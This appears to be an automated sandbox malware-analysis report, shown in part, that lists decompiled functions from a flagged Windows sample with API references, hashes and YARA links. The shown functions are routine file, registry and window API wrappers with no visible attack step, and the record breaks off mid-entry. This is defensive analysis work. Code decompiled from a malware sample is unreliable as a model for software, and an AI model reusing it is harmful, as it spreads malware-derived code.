                                                                            • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                            • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402C05 Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402C05(signed int __eax) {
				RECT* _t10;
				void* _t16;

				SendMessageW( *(_t16 - 8), 0xb,  *0x42f268 & __eax, _t10); // executed
				if( *((intOrPtr*)(_t16 - 0x30)) != _t10) {
					InvalidateRect( *(_t16 - 8), _t10, _t10);
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}





                                                                            0x00402c14
                                                                            0x00402c1d
                                                                            0x00402c24
                                                                            0x00402c24
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000000B,?), ref: 00402C14
                                                                            • InvalidateRect.USER32(?), ref: 00402C24
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 909852535-0
                                                                            • Opcode ID: 0509652848a83ac1d7feddac23dc24ced32f84c0220a85d8a6f2313ae5a63aab
                                                                            • Instruction ID: 5efb85e177e5feb05262591b5578bbf68be0fc1facb886aaf0ec985341d6bcc2
                                                                            • Opcode Fuzzy Hash: 0509652848a83ac1d7feddac23dc24ced32f84c0220a85d8a6f2313ae5a63aab
                                                                            • Instruction Fuzzy Hash: CEE08C72700008FFEB01CBA4EE84DAEB779FB40315B00007AF502A00A0D7300D40DA28
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 68%
                                                                            			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                            0x00406031
                                                                            0x0040603e
                                                                            0x00406053
                                                                            0x00406059

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                            0x0040600d
                                                                            0x00406013
                                                                            0x00406018
                                                                            0x00406021
                                                                            0x00406021
                                                                            0x0040602a

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                            • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                            • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                            0x00405af1
                                                                            0x00405af9
                                                                            0x00000000
                                                                            0x00405aff
                                                                            0x00000000

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • GetLastError.KERNEL32 ref: 00405AFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                            • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                            • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C2B98 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 38%
                                                                            			E713C2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x713c5050 != 0 && E713C2ADB(_a4) == 0) {
					 *0x713c5054 = _t93;
					if( *0x713c504c != 0) {
						_t93 =  *0x713c504c;
					} else {
						E713C30C0(E713C2AD5(), __ecx);
						 *0x713c504c = _t93;
					}
				}
				_t28 = E713C2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E713C2AFD();
					_t72 = _a4;
					_t79 =  *0x713c5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x713c5058 = _t72;
					E713C2AF7();
					_t33 = HeapCreate(??, ??, ??); // executed
					 *0x713c5034 = _t33;
					 *0x713c5038 = _t79;
					if( *0x713c5050 != 0 && E713C2ADB( *0x713c5058) == 0) {
						 *0x713c504c = _t94;
						_t94 =  *0x713c5054;
					}
					_t80 =  *0x713c5058;
					_a4 = _t80;
					 *0x713c5058 =  *((intOrPtr*)(E713C2AFD() + _t80));
					_t37 = E713C2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E713C2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E713C2B14() + _a4 + _v8);
							_push(E713C2B1E());
							if( *0x713c5050 <= 0 || E713C2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x713c504c =  *0x713c504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x713c5058;
					if( *0x713c5058 == 0) {
						 *0x713c504c = 0;
					}
					E713C2B42(_t107, _a4,  *0x713c5034,  *0x713c5038);
					return _a4;
				}
				_push(E713C2B14() + _a4);
				_t56 = E713C2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E713C2B26();
				_t87 = E713C2B22();
				_t90 = E713C2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                            0x713c2ba8
                                                                            0x713c2bb9
                                                                            0x713c2bc6
                                                                            0x713c2bda
                                                                            0x713c2bc8
                                                                            0x713c2bcd
                                                                            0x713c2bd2
                                                                            0x713c2bd2
                                                                            0x713c2bc6
                                                                            0x713c2be3
                                                                            0x713c2be8
                                                                            0x713c2bee
                                                                            0x713c2c32
                                                                            0x713c2c32
                                                                            0x713c2c37
                                                                            0x713c2c3c
                                                                            0x713c2c42
                                                                            0x713c2c44
                                                                            0x713c2c4a
                                                                            0x713c2c57
                                                                            0x713c2c59
                                                                            0x713c2c5e
                                                                            0x713c2c6b
                                                                            0x713c2c7e
                                                                            0x713c2c84
                                                                            0x713c2c8a
                                                                            0x713c2c8b
                                                                            0x713c2c91
                                                                            0x713c2c9d
                                                                            0x713c2ca3
                                                                            0x713c2cab
                                                                            0x713c2cac
                                                                            0x713c2caf
                                                                            0x713c2cba
                                                                            0x713c2cbc
                                                                            0x713c2cc8
                                                                            0x713c2cce
                                                                            0x713c2cd6
                                                                            0x713c2d02
                                                                            0x713c2d03
                                                                            0x713c2d05
                                                                            0x713c2d09
                                                                            0x713c2d09
                                                                            0x713c2d10
                                                                            0x713c2ce6
                                                                            0x713c2ce6
                                                                            0x713c2ce7
                                                                            0x713c2cf5
                                                                            0x713c2cfe
                                                                            0x713c2cfe
                                                                            0x713c2cd6
                                                                            0x713c2cba
                                                                            0x713c2d12
                                                                            0x713c2d19
                                                                            0x713c2d1b
                                                                            0x713c2d1b
                                                                            0x713c2d34
                                                                            0x713c2d42
                                                                            0x713c2d42
                                                                            0x713c2bf9
                                                                            0x713c2bfa
                                                                            0x713c2bff
                                                                            0x713c2c03
                                                                            0x713c2c08
                                                                            0x713c2c1c
                                                                            0x713c2c1d
                                                                            0x713c2c1e
                                                                            0x713c2c20
                                                                            0x713c2c25
                                                                            0x713c2c27
                                                                            0x713c2c27
                                                                            0x713c2c2a
                                                                            0x713c2c30
                                                                            0x00000000

                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000), ref: 713C2C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHeap
                                                                            • String ID:
                                                                            • API String ID: 10892065-0
                                                                            • Opcode ID: d81ed9555591e6ed77917dfb864ce680b7bbd48f2f5b53c9f3656c17f597de13
                                                                            • Instruction ID: 33b8023e59796edb955993204b224d9a6c5a637496bf32c05f3e477323bed6a6
                                                                            • Opcode Fuzzy Hash: d81ed9555591e6ed77917dfb864ce680b7bbd48f2f5b53c9f3656c17f597de13
                                                                            • Instruction Fuzzy Hash: FF419EB36082159FDB129FA9D884F693778FB14B18F30842AE806C61D0DB39EC858B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB85C4 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(?,-2F33BA73), ref: 02AB87D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: e49b838e02fa4b4cbe95243c08d3eca617bd0371067ca87fdb07293936795045
                                                                            • Instruction ID: 29cba26b2051387fb31eceea78d160804c55fd06e25db7ec6271e5e33486361b
                                                                            • Opcode Fuzzy Hash: e49b838e02fa4b4cbe95243c08d3eca617bd0371067ca87fdb07293936795045
                                                                            • Instruction Fuzzy Hash: 4E214876944349CFCB248E788D987DA73B6BFA9240F46011D9C4D9B241D3344A45CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AA9F39 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            • Opcode ID: 5140e1b5080d8ccb9bccb4062458a77d397766b35d853c1d675924b4664f0641
                                                                            • Instruction ID: fba02fedc66faa78ea821d3f88c6d09781324a92a17243d83d97a98ef6616018
                                                                            • Opcode Fuzzy Hash: 5140e1b5080d8ccb9bccb4062458a77d397766b35d853c1d675924b4664f0641
                                                                            • Instruction Fuzzy Hash: 26E026B09043386FC7299F30ACA08EE3E38EB81244B00152DE01D5B741C6325A01CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                            0x004023b2
                                                                            0x004023b2
                                                                            0x004023b4
                                                                            0x004023b8
                                                                            0x004023bb
                                                                            0x004023c0
                                                                            0x004023c5
                                                                            0x004023ce
                                                                            0x004023ce
                                                                            0x004023d3
                                                                            0x004023dc
                                                                            0x004023dc
                                                                            0x004023e9
                                                                            0x004015b4
                                                                            0x004015b6
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                            0x004063e2
                                                                            0x004063eb
                                                                            0x00406401
                                                                            0x00000000
                                                                            0x00406401
                                                                            0x004063ef
                                                                            0x00000000

                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                            • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                            • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x004060e3
                                                                            0x004060f3
                                                                            0x004060fb
                                                                            0x00000000
                                                                            0x00406102
                                                                            0x00000000
                                                                            0x00406104

                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                            • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                            • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x004060b4
                                                                            0x004060c4
                                                                            0x004060cc
                                                                            0x00000000
                                                                            0x004060d3
                                                                            0x00000000
                                                                            0x004060d5

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                            • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
